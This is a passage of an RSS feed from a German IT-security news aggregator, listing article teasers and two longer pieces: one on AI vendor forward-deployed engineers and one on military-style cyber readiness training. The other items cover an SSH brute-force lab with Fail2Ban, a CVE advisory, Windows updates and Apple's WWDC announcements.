</item>
<item>
<title><![CDATA[I Simulated an SSH Brute-Force Attack on My Ubuntu Server — Here’s How Fail2Ban Stopped It]]></title>
<description><![CDATA[Building a simple attack lab to understand how Fail2Ban detects and blocks repeated SSH login attempts.Continue reading on InfoSec Write-ups »]]></description>
<link>https://tsecurity.de/de/3592767/hacking/i-simulated-an-ssh-brute-force-attack-on-my-ubuntu-server-heres-how-fail2ban-stopped-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592767/hacking/i-simulated-an-ssh-brute-force-attack-on-my-ubuntu-server-heres-how-fail2ban-stopped-it/</guid>
<pubDate>Fri, 12 Jun 2026 09:33:55 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://infosecwriteups.com/i-simulated-an-ssh-brute-force-attack-on-my-ubuntu-server-heres-how-fail2ban-stopped-it-c2a65ea22267"><img src="https://cdn-images-1.medium.com/max/2600/1*SeoxaPKMqVPPIQITRqmNGw.jpeg" width="6000"></a></p><p class="medium-feed-snippet">Building a simple attack lab to understand how Fail2Ban detects and blocks repeated SSH login attempts.</p><p class="medium-feed-link"><a href="https://infosecwriteups.com/i-simulated-an-ssh-brute-force-attack-on-my-ubuntu-server-heres-how-fail2ban-stopped-it-c2a65ea22267">Continue reading on InfoSec Write-ups »</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[TBT: Here’s Our Top 5 Favorite Android Hardware]]></title>
<description><![CDATA[Kellen and I were talking Android hardware this week, which then ended up with us sharing photos of our favorite Android phones. Since it’s now Thursday, it seemed like a great opportunity for a classy #TBT. This is a quick look back at our favorite Android hardware. We limited it to a top 5, eve...]]></description>
<link>https://tsecurity.de/de/3591323/it-nachrichten/tbt-heres-our-top-5-favorite-android-hardware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591323/it-nachrichten/tbt-heres-our-top-5-favorite-android-hardware/</guid>
<pubDate>Thu, 11 Jun 2026 18:47:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Kellen and I were talking Android hardware this week, which then ended up with us sharing photos of our favorite Android phones. Since it’s now Thursday, it seemed like a great opportunity for a classy #TBT. This is a quick look back at our favorite Android hardware. We limited it to a top 5, even...</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/06/11/tbt-heres-our-top-5-favorite-android-hardware/">TBT: Here’s Our Top 5 Favorite Android Hardware</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-33886 | Autodesk AutoCAD 2022/2023 MODEL File exceptional condition (EUVD-2022-36924)]]></title>
<description><![CDATA[A vulnerability has been found in Autodesk AutoCAD 2022/2023 and classified as problematic. Affected is an unknown function of the component MODEL File Handler. The manipulation leads to handling of exceptional conditions.

This vulnerability is listed as CVE-2022-33886. The attack may be initiat...]]></description>
<link>https://tsecurity.de/de/3590479/sicherheitsluecken/cve-2022-33886-autodesk-autocad-20222023-model-file-exceptional-condition-euvd-2022-36924/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590479/sicherheitsluecken/cve-2022-33886-autodesk-autocad-20222023-model-file-exceptional-condition-euvd-2022-36924/</guid>
<pubDate>Thu, 11 Jun 2026 14:09:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/autodesk:autocad">Autodesk AutoCAD 2022/2023</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected is an unknown function of the component <em>MODEL File Handler</em>. The manipulation leads to handling of exceptional conditions.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2022-33886">CVE-2022-33886</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI vendor FDEs: Key considerations and concerns]]></title>
<description><![CDATA[When it comes to AI deployments, IT leaders are often caught in an awkward middle space, trying to reconcile conflicting directives from senior management with constantly changing AI models, capabilities, and costs; data governance and security needs; and the limitations of their own team.



“Ve...]]></description>
<link>https://tsecurity.de/de/3590315/it-nachrichten/ai-vendor-fdes-key-considerations-and-concerns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590315/it-nachrichten/ai-vendor-fdes-key-considerations-and-concerns/</guid>
<pubDate>Thu, 11 Jun 2026 13:17:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>When it comes to AI deployments, IT leaders are often caught in an awkward middle space, trying to reconcile conflicting directives from senior management with constantly changing AI models, capabilities, and costs; data governance and security needs; and the limitations of their own team.</p>



<p>“Very few real benefits can be attained by simply purchasing an AI product and giving it to employees. Vendors have been overselling that fallacy for the past three years,” said <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="noreferrer noopener">Nader Henein</a>, a Gartner VP analyst.</p>



<p>“The reality is that strong AI value and consistent ROI are almost always a result of deep and intentional integration of AI capabilities into existing workflows. For that you need specialized teams, which do not come cheap, and organizations have been recruiting those teams in a variety of ways,” Heinen said.</p>



<p>Among the options available to IT leaders looking for help with AI deployments are traditional IT consultancies, AI-specific consultancies, and independent contractors. Large enterprises with deep pockets can consider acquiring an AI firm and integrating its technology and expert staff. The use of open source to reduce vendor lock-in is a strategy that can sit on top of those others, <a href="https://www.cio.com/article/4019828/how-capital-one-drives-returns-on-its-ai-investments.html" target="_blank">an approach that Capital One has used</a>. </p>



<p>But the option that has been getting the most attention recently is bringing in <a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html">forward-deployed engineers</a> (FDEs), teams of experts from AI vendors that embed with a customer’s in-house engineers to oversee AI rollouts within the enterprise environment. Both <a href="https://www.cio.com/article/4169759/openais-new-ai-consulting-offering-raises-questions-of-trust-strategy.html" target="_blank">OpenAI</a> and <a href="https://www.cio.com/article/4167981/anthropics-financial-agents-expose-forward-deployed-engineers-as-new-ai-limiting-factor.html" target="_blank">Anthropic</a> have recently announced FDE offerings, for example, and <a href="https://www.computerworld.com/article/4176398/microsoft-ey-to-spend-1-billion-on-helping-customers-buy-agentic-ai-2.html" target="_blank">Microsoft</a> is partnering with consulting giant EY in a new FDE program for agentic AI deployments.</p>



<p>Engineering teams employed by AI vendors have key strengths, such as understanding their models better than anyone else, having experience integrating those models into different types of enterprise environments, and knowing about upcoming model capabilities before they’re announced. But they also have the obvious drawback of vendor lock-in. Even if future rollouts are not within their contracted deliverables, those vendor employees could subtly influence a client’s future AI efforts. </p>



<p><a href="https://www.linkedin.com/in/fvillanustre/" target="_blank" rel="noreferrer noopener">Flavio Villanustre</a>, CISO for LexisNexis Risk Solutions, cautions IT executives to move into FDE programs carefully. </p>



<p>FDEs “are financially incentivized to grow customers’ use of a vendor’s AI products and to create stickiness with that vendor’s services,” he said. “While FDEs may be a reasonable value-added service by the AI vendor, customers should always find other unbiased expert opinions that can evaluate competitive solutions across multiple vendors.”</p>



<p>This is particularly important at a time when “investor-subsidized AI token business models are starting to show cracks,” Villanustre said. “Also, in the current rapid pace of innovation in this field where AI vendors are constantly leapfrogging each other, retaining the agility to move from one vendor to the next could create significant competitive advantages.”</p>



<p>Analysts, consultants, and other industry experts who spoke with <em>Computerworld</em> about FDEs echoed Villanustre’s caution, citing concerns around hidden costs, confidentiality, observability, and vendor lock-in.</p>



<h2 class="wp-block-heading">Long-term costs and vendor lock-in</h2>



<p>A key issue that IT executives need to consider is how long the FDE teams will be needed. The enterprise will likely need an ongoing series of AI deployments synced with the current AI model(s). If help is needed today, why would that change tomorrow?</p>



<p>Enterprises tend to overlook those longer-term costs, said <a href="http://www.linkedin.com/in/sangyeob/" target="_blank" rel="noreferrer noopener">John Sangyeob Kim</a>, an AI engineer at software development vendor Solidroad.</p>



<p>“Deployment is maybe 20% of the total cost. The other 80% is keeping the system running through model upgrades, data drift, and edge cases that only appear after months in production,” Kim said. “Most contracts price the first part and assume the rest. Deployment isn’t the hard part of enterprise AI anymore. The next eighteen months are.”</p>



<p>And whether it’s intentional or not, FDEs will naturally favor their own product portfolio — it’s what they know best.</p>



<p>“FDEs from model labs are good at making their own models work in your environment. They are less suited for multi-model systems, because their incentive is to keep you inside their ecosystem,” Kim said.</p>



<p><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, said IT leaders should look at the FDE model as a strategy involving ongoing operational power. </p>



<p>“Whoever shapes the deployment pattern shapes the enterprise’s future muscle memory. Whoever owns the evaluation layer owns the truth layer. Whoever controls the integration logic controls the dependency map,” Gogia said. “This is why the FDE model matters. It is not just another delivery option. It is the frontier AI vendor moving closer to the customer’s workflow, operating model, and decision architecture.”</p>



<p>That proximity cuts both ways, Gogia noted. “FDEs are embedded inside the customer’s [environment], but they are also connected to the vendor’s commercial center of gravity. Their instinct will be to build around the model family, tooling assumptions, deployment patterns, and product roadmap they know best. This is perfectly natural. It is also precisely why CIOs must be cautious,” he said.</p>



<p>Allowing AI vendor employees an outsized say in enterprise deployment decisions could lock in model vendor dependency, which in turn will fuel high prices that can’t be fought effectively.</p>



<p>“FDEs can accelerate deployment and deepen dependency at the same time,” Gogia said. “Frontier AI vendors are no longer content to sell access to models. They increasingly want to shape how enterprises deploy intelligence. That is a larger prize.”</p>



<h2 class="wp-block-heading">What happens when the FDE team leaves?</h2>



<p>FDE post-departure risks are severe and often underappreciated, according to <a href="https://acceligence.com/talent/profiles/justin-greis/" target="_blank" rel="noreferrer noopener">Justin Greis</a>, CEO of consulting firm Acceligence and former head of the North American cybersecurity practice at McKinsey.</p>



<p>For one thing, the FDE team learns a massive number of operational details from the enterprise deployment. Although NDAs and confidentiality contracts protect any data accessed, they often don’t regulate observed processes and procedures. </p>



<p>“The learnings are absolutely going to be taken from client to client,” Greis said. “Whoever helps deploy AI will learn far more than what appears in the statement of work. They will learn the real workflows, the undocumented exceptions, the data-quality gaps, the approval bottlenecks, the security workarounds, and the places where the business depends on a few people knowing what to do when the process breaks. That knowledge may be as sensitive and precious as the data itself.”</p>



<p>Another critical but often overlooked issue is how much meaningful control will IT have over the project if and when the FDE team leaves.</p>



<p>“The danger is not using outside help. Most companies will need outside help,” Greis said. “The danger is using outside help in a way that leaves the enterprise less capable and more dependent when the engagement is over.”</p>



<p>It is precisely those operational decisions that IT often neglects, said Solidroad’s Kim.</p>



<p>“The best predictor of success is not the vendor. It is whether one internal engineer truly understands the system before the implementer leaves. What matters is who owns the evaluation loop after the demo,” Kim said.</p>



<p>“What happens to our prompts, scorers, and guardrails when the model version changes? If we paused this engagement tomorrow, what would actually stop working, by design or by accident?” Kim asked. “Where do you want the enterprise’s AI learning, control, and dependency to live after the engagement is over?”</p>



<p>Kim argues that <a href="https://www.cio.com/article/4083537/observability-for-the-modern-enterprise-bridging-it-security-and-business-kpis.html" target="_blank">observability</a> — the ability to understand and manage all elements of a complex enterprise environment — is a critical function to which IT often gives insufficient attention. Determining whether the project uses the enterprise’s observability stack or the vendor’s observability stack is crucial.</p>



<p>“If the implementer is using <em>their</em> observability stack, that is fine during the build, but you need a plan to migrate it to something you own before they leave; otherwise the visibility walks out of the door with them,” Kim said. “If they are using <em>yours</em>, that is the best case. It means they are working inside the system your team will operate long-term.”</p>



<p>A major problem crops up when they are using neither the enterprise’s nor the vendor’s observability stack. “<em>Neither</em> means they are building the system without any production observability layer at all, and you inherit a system you cannot see into. The first time something breaks in production, you have no traces, no failure history, and no way to tell whether the issue is a model regression, a data problem, or a code bug,” Kim said.</p>



<p>“If observability was not a priority during the build, evals and regression testing usually weren’t either, so you are inheriting a system you cannot measure and cannot safely change. That’s the worst possible handoff position,” he said.</p>



<h2 class="wp-block-heading">Weighing the alternatives</h2>



<p>While the FDE approach is not new, it is just now beginning a surge in popularity, and there are a finite number of such specialists available. That means not all companies even have the option of using FDEs.</p>



<p>This availability disconnect is especially prominent for non-US deployments, where on-site FDEs are rarer, said Gartner’s Henein. “Where is the development happening? There may not be FDEs available in that region,” he said. </p>



<p>There are plenty of other places enterprises can turn to for AI help. <a href="https://www.linkedin.com/in/ishraqkhann/" target="_blank" rel="noreferrer noopener">Ishraq Khan</a>, CEO of coding productivity tool vendor Kodezi, encourages IT executives to consider a wide range of options but notes that all approaches have major drawbacks.</p>



<p>“Traditional consultancies are usually stronger at governance, process, compliance, and organizational coordination. They know how large enterprises operate politically and structurally. The downside is that many move slower and often lack deep frontier AI specialization,” Khan said.</p>



<p>Gogia from Greyhound Research put it more colorfully: Traditional IT consulting firms “know how to get legal, risk, security, finance, HR, and business units into the same room without anybody setting fire to the carpet. For regulated enterprises, that matters,” he said.</p>



<p>Specialized AI consultancies have a different set of strengths, Khan said. “AI-native consultancies move much faster and are often more technically current, but many are still immature operationally. Some can build impressive demos without fully understanding long-term maintainability, governance, or production reliability.”</p>



<p>Greis from Acceligence commented on two other options for bringing in outside AI help. Using an independent contractor “can be great for eval design, architecture reviews, red teaming, agent design, or getting a stalled team unstuck,” he said, but it can increase the risk of “key-person dependency,” where a single external person is the only one who understands the system.</p>



<p>As for purchasing an AI firm and onboarding its employees, a practice known as “acquihiring,” Greis said it can work well when the AI capability and expertise being brought in are truly strategic for the acquiring enterprise. But there is a risk that the acquired team will be smothered by the parent company’s bureaucracy: “You buy a speedboat, bolt it to an aircraft carrier, and then wonder why it stopped moving,” he said.</p>



<p>Finally, an open-source strategy can give companies flexibility and reduce vendor dependence, but “many companies underestimate the operational burden that comes with it,” Kodezi’s Khan said. “Open source only helps if the organization has the internal talent and discipline to maintain it properly.”</p>



<p>Bottom line: enterprises need to define their true objectives before deciding on an approach. Khan offered several key questions for CIOs to consider: “Who owns the deployment after implementation? Can we move providers later without rebuilding everything? What happens if the vendor relationship changes or disappears? Are we optimizing for short-term deployment speed or long-term operational resilience?”</p>



<p>In any scenario where outside firms have direct access to enterprise systems, IT needs to be kept fully in the loop. “The worst outcome is when an enterprise successfully deploys AI but no longer fully understands how its own systems operate underneath,” Khan said.</p>



<h3 class="wp-block-heading">External help for AI deployments: 6 options</h3>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td></td><td><strong>Pros</strong></td><td><strong>Cons</strong></td></tr><tr><td><strong>AI vendor FDEs</strong></td><td><strong>+  </strong>Best expertise on the main model being used</td><td><strong>–  </strong>Vendor lock-in<br><br><strong>–  </strong>Operational detail leaks</td></tr><tr><td><strong>Traditional IT consultancies</strong></td><td><strong>+  </strong>Best understanding of change management, legacy integration, global rollout, governance, and operating-model redesign</td><td><strong>–  </strong>Can be too slow, too expensive, or too generic</td></tr><tr><td><strong>AI consulting firms</strong></td><td><strong>+  </strong>More practical AI deployment experience than traditional consultants<br><br><strong>+  </strong>Less vendor lock-in than model-provider FDEs</td><td><strong>–  </strong>May not sufficiently understand enterprise-grade requirements: security, identity, auditability, compliance, incident response, cost controls, and long-term maintainability</td></tr><tr><td><strong>Independent contractors</strong></td><td><strong>+  </strong>Useful for precision tasks: eval design, architecture reviews, red teaming, agent design, or getting a stalled team unstuck</td><td><strong>–  </strong>Risk of ‘key-person dependency’</td></tr><tr><td><strong>‘Acquihiring’ an AI firm</strong></td><td><strong>+  </strong>Works when the acquired capability is truly strategic</td><td><strong>–  </strong>Acquired team can be smothered inside existing bureaucracy</td></tr><tr><td><strong>Deploying open-source products</strong></td><td><strong>+  </strong>Reduces dependency on one model vendor<br><br><strong>+  </strong>Attractive for data sovereignty, control over enterprise systems, cost efficiencies, and regulated environments</td><td><strong>–  </strong>Enterprise takes on full responsibility for security, patching, evaluation, deployment, monitoring, and lifecycle management</td></tr></tbody></table> </div><figcaption class="wp-element-caption"><em>Source: Acceligence</em></figcaption></figure>



<p><strong>Related reading:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/4171867/heres-one-career-emerging-from-the-ai-shift-forward-deployed-engineers.html" target="_blank">Here’s one career emerging from the AI shift: ‘forward-deployed engineers’</a></li>



<li><a href="https://www.cio.com/article/4118737/the-forward-deployed-engineer-why-talent-not-technology-is-the-true-bottleneck-for-enterprise-ai.html" target="_blank">The forward-deployed engineer: Why talent, not technology, is the true bottleneck for enterprise AI</a></li>



<li><a href="https://www.infoworld.com/article/4171983/the-new-ai-lock-in.html" target="_blank">The new AI lock-in</a></li>
</ul>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slow Triage Is Raising Business Risk. Here’s How SOC Teams Cut Investigation Time]]></title>
<description><![CDATA[The longer it takes to confirm a threat, the longer the business stays exposed. Slow triage leaves SOC teams stuck between suspicious alerts and clear response decisions, giving malware, phishing attacks, and other threats more time to progress.   For CISOs…
Read more →
The post Slow Triage Is Ra...]]></description>
<link>https://tsecurity.de/de/3588306/it-security-nachrichten/slow-triage-is-raising-business-risk-heres-how-soc-teams-cut-investigation-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588306/it-security-nachrichten/slow-triage-is-raising-business-risk-heres-how-soc-teams-cut-investigation-time/</guid>
<pubDate>Wed, 10 Jun 2026 18:25:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The longer it takes to confirm a threat, the longer the business stays exposed. Slow triage leaves SOC teams stuck between suspicious alerts and clear response decisions, giving malware, phishing attacks, and other threats more time to progress.   For CISOs…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/slow-triage-is-raising-business-risk-heres-how-soc-teams-cut-investigation-time/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/slow-triage-is-raising-business-risk-heres-how-soc-teams-cut-investigation-time/">Slow Triage Is Raising Business Risk. Here’s How SOC Teams Cut Investigation Time</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slow Triage Is Raising Business Risk. Here’s How SOC Teams Cut Investigation Time ]]></title>
<description><![CDATA[The longer it takes to confirm a threat, the longer the business stays exposed. Slow triage leaves SOC teams stuck between suspicious alerts and clear response decisions, giving malware, phishing attacks, and other threats more time to progress.   For CISOs and security leaders, this is no longer...]]></description>
<link>https://tsecurity.de/de/3588059/it-security-nachrichten/slow-triage-is-raising-business-risk-heres-how-soc-teams-cut-investigation-time/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588059/it-security-nachrichten/slow-triage-is-raising-business-risk-heres-how-soc-teams-cut-investigation-time/</guid>
<pubDate>Wed, 10 Jun 2026 16:56:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The longer it takes to confirm a threat, the longer the business stays exposed. Slow triage leaves SOC teams stuck between suspicious alerts and clear response decisions, giving malware, phishing attacks, and other threats more time to progress.   For CISOs and security leaders, this is no longer just an analyst productivity issue. It is a […]</p>
<p>The post <a href="https://cybersecuritynews.com/slow-triage-is-raising-business-risk-heres-how-soc-teams-cut-investigation-time/">Slow Triage Is Raising Business Risk. Here’s How SOC Teams Cut Investigation Time </a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I tested Windows 11 June 2026 Updates: Here’s everything new, improved, and fixed]]></title>
<description><![CDATA[Microsoft's June 2026 Patch Tuesday update for Windows 11 (25H2 and 24H2) is here. This feature-packed release brings the highly anticipated Low Latency Profile for faster app launches, Shared Audio, Task Manager NPU process column, and critical Secure Boot 2023 certificate updates.
The post I te...]]></description>
<link>https://tsecurity.de/de/3585295/windows-tipps/i-tested-windows-11-june-2026-updates-heres-everything-new-improved-and-fixed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585295/windows-tipps/i-tested-windows-11-june-2026-updates-heres-everything-new-improved-and-fixed/</guid>
<pubDate>Tue, 09 Jun 2026 19:11:31 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft's June 2026 Patch Tuesday update for Windows 11 (25H2 and 24H2) is here. This feature-packed release brings the highly anticipated Low Latency Profile for faster app launches, Shared Audio, Task Manager NPU process column, and critical Secure Boot 2023 certificate updates.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/06/09/i-tested-windows-11-june-2026-updates-heres-everything-new-improved-and-fixed/">I tested Windows 11 June 2026 Updates: Here’s everything new, improved, and fixed</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple could be the biggest winner in AI. Here’s why.]]></title>
<description><![CDATA[Apple stands poised to emerge as the biggest winner in the artificial intelligence revolution — not necessarily by developing cutting-edge…
The post Apple could be the biggest winner in AI. Here’s why. appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3585291/ios-mac-os/apple-could-be-the-biggest-winner-in-ai-heres-why/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585291/ios-mac-os/apple-could-be-the-biggest-winner-in-ai-heres-why/</guid>
<pubDate>Tue, 09 Jun 2026 19:10:35 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple stands poised to emerge as the biggest winner in the artificial intelligence revolution — not necessarily by developing cutting-edge…</p>
<p>The post <a href="https://macdailynews.com/2026/06/09/apple-could-be-the-biggest-winner-in-ai-heres-why/">Apple could be the biggest winner in AI. Here’s why.</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s Siri AI is not ‘Google Gemini with Apple branding’; here’s how it really works]]></title>
<description><![CDATA[Apple's new Siri AI (unveiled today at WWDC 2026) is powered by Google's Gemini-based models under the hood, but it is not a simple…
The post Apple’s Siri AI is not ‘Google Gemini with Apple branding’; here’s how it really works appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3582957/ios-mac-os/apples-siri-ai-is-not-google-gemini-with-apple-branding-heres-how-it-really-works/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582957/ios-mac-os/apples-siri-ai-is-not-google-gemini-with-apple-branding-heres-how-it-really-works/</guid>
<pubDate>Mon, 08 Jun 2026 23:23:27 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple's new Siri AI (unveiled today at WWDC 2026) is powered by Google's Gemini-based models under the hood, but it is not a simple…</p>
<p>The post <a href="https://macdailynews.com/2026/06/08/apples-siri-ai-is-not-google-gemini-with-apple-branding-heres-how-it-really-works/">Apple’s Siri AI is not ‘Google Gemini with Apple branding’; here’s how it really works</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[macOS Golden Gate: Here’s the list of Macs compatible with the update]]></title>
<description><![CDATA[Today during its WWDC keynote, Apple unveiled the Mac’s next major software version: macOS Golden Gate. Here’s the full list of Mac models compatible with the update.



 more…]]></description>
<link>https://tsecurity.de/de/3582509/ios-mac-os/macos-golden-gate-heres-the-list-of-macs-compatible-with-the-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3582509/ios-mac-os/macos-golden-gate-heres-the-list-of-macs-compatible-with-the-update/</guid>
<pubDate>Mon, 08 Jun 2026 20:40:08 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="feat-image"><img src="https://9to5mac.com/wp-content/uploads/sites/6/2026/06/WWDC-26-13.54.36.jpg?quality=82&amp;strip=all&amp;w=1600"></div><p class="wp-block-paragraph">Today during its <a href="https://9to5mac.com/2026/06/08/wwdc-2026-news-hub-live-from-apple-park-ios-27-new-siri-more/">WWDC keynote</a>, Apple unveiled the Mac’s next major software version: macOS Golden Gate. Here’s the full list of Mac models compatible with the update.</p>



 <a data-layer-pagetype="post" data-layer-postcategory="mac,macos-golden-gate,wwdc-2026" data-layer-viewtype="taxonomy-ninetofive_guides" data-post-id="1054906" href="https://9to5mac.com/2026/06/08/macos-golden-gate-heres-the-list-of-macs-compatible-with-the-update/#more-1054906" class="more-link">more…</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why most enterprise security teams would fail a military readiness test]]></title>
<description><![CDATA[Have you ever watched a military cyber ops team go to work responding to a cyberattack simulation? It’s like that scene from Die Hard 4.0 when all the screens start flashing red and systems start shutting down; however, unlike the movies, where bumbling government IT workers are caught out and pa...]]></description>
<link>https://tsecurity.de/de/3580904/it-security-nachrichten/why-most-enterprise-security-teams-would-fail-a-military-readiness-test/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580904/it-security-nachrichten/why-most-enterprise-security-teams-would-fail-a-military-readiness-test/</guid>
<pubDate>Mon, 08 Jun 2026 11:09:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Have you ever watched a military cyber ops team go to work responding to a cyberattack simulation? It’s like that scene from Die Hard 4.0 when all the screens start flashing red and systems start shutting down; however, unlike the movies, where bumbling government IT workers are caught out and panicking, our military actually moves with practiced precision to understand, contain, and mitigate the threat. Everybody understands their roles and any gaps are quickly highlighted and handled. This is because the military treats cyber as a kinetic threat requiring constant mission rehearsal, while the corporate sector is still treating cyber defense as a compliance checkbox, rather than an operational capability. This is untenable in a world where attackers constantly innovate their tactics and techniques to probe and access systems.</p>



<p>Over the past 12 months, we’ve seen just how unprepared different industry sectors have been in the face of major cyber incidents. Early in 2025, retailers and insurance brokers were brought down by the Scattered Spider group, and major manufacturers, including Jaguar Land Rover and Asahi Beer, saw months of downtime following ransomware attacks resulting from <a href="https://www.csoonline.com/article/4154550/supply-chain-security-is-now-a-board-level-issue-heres-what-csos-need-to-know.html">supply chain compromises</a>.</p>



<p>More recently, researchers at Cisco revealed that frontier models from OpenAI, Anthropic, Google, xAI, and Amazon <a href="https://www.csoonline.com/article/4177903/ai-models-more-vulnerable-than-claimed-when-faced-with-iterative-attacks.html">have significantly worse risk profiles</a> when pressured in multi-turn attacks, a discovery that revealed attack success rates are considerably higher than those benchmarked in simulated single-prompt attacks. This, combined with recent news that the Google Threat Intelligence Group identified what researchers believe to be <a href="https://www.csoonline.com/article/4169046/google-discovers-weaponized-zero-day-exploits-created-with-ai.html">the first zero-day exploit created using AI</a>, represents an entirely new stage in the technological arms race.</p>



<p>Those old-fashioned tabletop exercises where, once a year, you’d get everyone from IT to PR in a room for a couple of days and play out various scenarios and then tick that audit box for another 12 months aren’t going to cut it when attackers are probing on a daily basis. The military is using dynamic cyber ranges to test their real tools, people, and processes, in an exact simulation of their unique environment, against real-world threats like the tactics of Scattered Spider. Without real-world testing of your team’s capabilities, you’re not going to be able to go into an incident scenario confident that everyone’s prepared.</p>



<p>So, what can we learn from how the military prepares for cyberattacks in terms of mindset, readiness, and execution?</p>



<p>Military cyber doctrine starts with the assumption that you will be attacked and so prepare as though an attack is inevitable and not hypothetical. Businesses need to shift their mindset from “preventing breaches” to “detail, contain, and recover” and treat incidents as operational events rather than reputational crises. This reduces panic and leads to better decisions under pressure. It’s also critical for business leaders to understand their true vulnerabilities. Reputational and financial harm is typical collateral damage following a cyberattack, but was this the intended outcome? If sensitive data is compromised, are there persistent threats beyond the initial attack? Just as the military examines the secondary and tertiary impacts of risk scenarios in threat modeling, business leaders have to consider what else beyond their reputation and stock price may be compromised when they are attacked.</p>



<p>The military runs constant exercises; simulations, red team and blue team drills, and scenario planning that reflects real adversary behavior. Businesses can exercise that muscle by running regular live cyber simulations and updating based on real-world attacks. Conventional training still has its place, and companies should continue to invest in professional development programs that provide a strong foundational understanding of the most urgent threats facing their business. But, as the military says, “train like you fight.” There is simply no substitute for practical, hands-on training, especially when it comes to high-pressure, time-sensitive scenarios such as large-scale cyberattacks.</p>



<p>This readiness and preparedness training can, and should<em>,</em> extend to AI Agents too. Think about it like an “AI Proving Grounds”. Effectively, a realistic, intelligent environment where organizations can safely train human operators alongside AI agents, test autonomous workflows, and validate how both perform under real adversarial pressure before deployment. Continue to involve all the stakeholders, including executives and comms teams, who are going to be on the front line of customer, investor, and media inquiries should an attack occur. Without realism, readiness is an assumption, not a fact.</p>



<p>In a military cyber incident, everyone knows who decides, who communicates, and who executes, reducing any mid-crisis debate and empowering teams to act without permission to faster contain the incident. This principle is just as relevant in a corporate environment. Individual training is crucial, and operators should be confident acting in isolation, but it’s just as important that everyone in a rapid response team can work effectively with others, under often-intense pressure. This simulated teamwork is another advantage offered by AI Proving Grounds. In the same way that everyone in a military chain of command understands their role and that of their unit, businesses can pre-assign decision makers and define escalation paths before an incident to ensure clarity and calm rather than blind panic.</p>



